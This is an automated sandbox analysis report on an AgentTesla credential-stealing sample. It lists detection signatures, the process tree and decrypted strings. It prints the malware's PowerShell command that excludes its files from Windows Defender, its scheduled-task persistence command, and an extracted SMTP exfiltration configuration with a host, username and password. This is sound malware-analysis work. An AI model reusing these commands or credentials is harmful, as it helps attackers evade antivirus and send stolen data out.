Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LisectAVT_2403002A_16.exe

Overview

General Information

Sample name:LisectAVT_2403002A_16.exe
Analysis ID:1482478
MD5:2c10cb6c2e23b7712ebf4042d669cd09
SHA1:f86adb59bd065afd9195b9375271096f341842dc
SHA256:546569a42f00553d7fda79e6961779afadd95ea8e6a8738ef344275f2b642244
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • LisectAVT_2403002A_16.exe (PID: 6668 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe" MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
    • powershell.exe (PID: 7244 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7768 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7316 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • LisectAVT_2403002A_16.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe" MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
    • LisectAVT_2403002A_16.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe" MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
  • NxmtwwVGOtEdjd.exe (PID: 7680 cmdline: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
    • schtasks.exe (PID: 7912 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NxmtwwVGOtEdjd.exe (PID: 7964 cmdline: "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe" MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
    • NxmtwwVGOtEdjd.exe (PID: 7972 cmdline: "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe" MD5: 2C10CB6C2E23B7712EBF4042D669CD09)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000F.00000002.2902484873.0000000002D3A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000002.2898350883.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000009.00000002.2901886951.0000000002ECA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000A.00000002.1787617220.0000000004500000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            00000000.00000002.1723431532.00000000041AF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              Click to see the 12 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              10.2.NxmtwwVGOtEdjd.exe.45296a0.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                10.2.NxmtwwVGOtEdjd.exe.4500680.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.LisectAVT_2403002A_16.exe.41d8730.5.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      10.2.NxmtwwVGOtEdjd.exe.45296a0.4.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                        Click to see the 3 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, ParentProcessId: 6668, ParentProcessName: LisectAVT_2403002A_16.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ProcessId: 7244, ProcessName: powershell.exe
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, ParentProcessId: 6668, ParentProcessName: LisectAVT_2403002A_16.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ProcessId: 7244, ProcessName: powershell.exe
                        Sigma detected: Suspicious Add Scheduled Task Parent
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe, ParentImage: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe, ParentProcessId: 7680, ParentProcessName: NxmtwwVGOtEdjd.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp", ProcessId: 7912, ProcessName: schtasks.exe
                        Sigma detected: Suspicious Outbound SMTP Connections
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, Initiated: true, ProcessId: 7544, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, ParentProcessId: 6668, ParentProcessName: LisectAVT_2403002A_16.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", ProcessId: 7316, ProcessName: schtasks.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, ParentProcessId: 6668, ParentProcessName: LisectAVT_2403002A_16.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ProcessId: 7244, ProcessName: powershell.exe

                        Persistence and Installation Behavior

                        barindex
                        Sigma detected: Scheduled temp file as task from temp location
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe", ParentImage: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe, ParentProcessId: 6668, ParentProcessName: LisectAVT_2403002A_16.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp", ProcessId: 7316, ProcessName: schtasks.exe

                        Snort Signatures

                        No Snort rule has matched

                        Suricata Signatures

                        Timestamp:2024-07-25T23:35:36.103588+0200
                        SID:2022930
                        Source Port:443
                        Destination Port:49737
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-25T23:35:25.918768+0200
                        SID:2855542
                        Source Port:49735
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-25T23:35:29.982176+0200
                        SID:2855542
                        Source Port:49736
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-25T23:35:55.569991+0200
                        SID:2022930
                        Source Port:443
                        Destination Port:53201
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-25T23:35:56.837685+0200
                        SID:2022930
                        Source Port:443
                        Destination Port:53202
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-25T23:35:11.625146+0200
                        SID:2840032
                        Source Port:49736
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: LisectAVT_2403002A_16.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeAvira: detection malicious, Label: TR/Kryptik.mzsma
                        Found malware configuration
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: LisectAVT_2403002A_16.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: /log.tmp
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>[
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ]<br>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Time:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>User Name:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>Computer Name:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>OSFullName:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>CPU:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>RAM:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IP Address:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <hr>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: New
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IP Address:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: mail.mbarieservicesltd.com
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: saless@mbarieservicesltd.com
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: *o9H+18Q4%;M
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: iinfo@mbarieservicesltd.com
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: false
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: appdata
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: KTvkzEc
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: KTvkzEc.exe
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: KTvkzEc
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Type
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <hr>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <b>[
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ]</b> (
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: )<br>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {BACK}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {ALT+TAB}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {ALT+F4}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {TAB}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {ESC}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {Win}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {CAPSLOCK}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {KEYUP}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {KEYDOWN}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {KEYLEFT}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {KEYRIGHT}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {DEL}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {END}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {HOME}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {Insert}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {NumLock}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {PageDown}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {PageUp}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {ENTER}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F1}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F2}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F3}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F4}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F5}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F6}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F7}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F8}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F9}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F10}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F11}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {F12}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: control
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {CTRL}
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: &amp;
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: &lt;
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: &gt;
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: &quot;
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <br><hr>Copied Text: <br>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <hr>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: logins
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IE/Edge
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Secure Note
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Web Password Credential
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Credential Picker Protector
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Web Credentials
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Credentials
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Domain Certificate Credential
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Domain Password Credential
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Extended Credential
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SchemaId
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pResourceElement
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pIdentityElement
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pPackageSid
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IE/Edge
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UC Browser
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UCBrowser\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Login Data
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: journal
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: wow_logins
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Safari for Windows
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <array>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <dict>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <string>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </string>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <string>
